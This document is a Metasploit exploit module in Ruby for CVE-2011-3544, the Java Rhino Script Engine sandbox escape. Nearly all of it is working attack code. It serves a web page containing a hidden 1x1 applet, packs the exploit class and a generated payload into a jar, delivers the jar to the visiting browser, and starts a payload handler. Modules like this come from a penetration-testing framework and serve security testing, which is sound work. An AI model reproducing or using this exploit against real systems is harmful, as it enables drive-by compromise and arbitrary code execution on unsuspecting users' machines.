##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',
        'Description' => %q{
          This module exploits a vulnerability in the Rhino Script Engine that
          can be used by a Java Applet to run arbitrary Java code outside of
          the sandbox.  The vulnerability affects version 7 and version 6 update
          27 and earlier, and should work on any browser that supports Java
          (for example: IE, Firefox, Google Chrome, etc)
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Michael Schierl', # Discovery
          'juan vazquez', # metasploit module
          'Edward D. Teach <teach[at]consortium-of-pwners.net>',
          'sinn3r'
        ],
        'References' => [
          [ 'CVE', '2011-3544' ],
          [ 'OSVDB', '76500' ],
          [ 'ZDI', '11-305' ],
          [ 'URL', 'http://schierlm.users.sourceforge.net/CVE-2011-3544.html' ],
        ],
        'Platform' => %w{java linux win},
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Apple OSX',
            {
              'ARCH' => ARCH_X86,
              'Platform' => 'osx'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-10-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def on_request_uri(cli, request)
    if not request.uri.match(/\.jar$/i)
      if not request.uri.match(/\/$/)
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      print_status("#{self.name} handling request")

      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
      return
    end

    paths = [
      [ "Exploit.class" ]
    ]

    p = regenerate_payload(cli)

    jar = p.encoded_jar
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0, idx].join("/") + "/"
        if !(jar.entries.map { |e| e.name }.include?(full))
          jar.add_file(full, '')
        end
      end
      fd = File.open(File.join(Msf::Config.data_directory, "exploits", "cve-2011-3544", path), "rb")
      data = fd.read(fd.stat.size)
      jar.add_file(path.join("/"), data)
      fd.close
    end

    print_status("Sending Applet.jar")
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })

    handler(cli)
  end

  def generate_html
    html = "<html><head></head>"
    html += "<body>"
    html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
    html += "</applet></body></html>"
    return html
  end
end
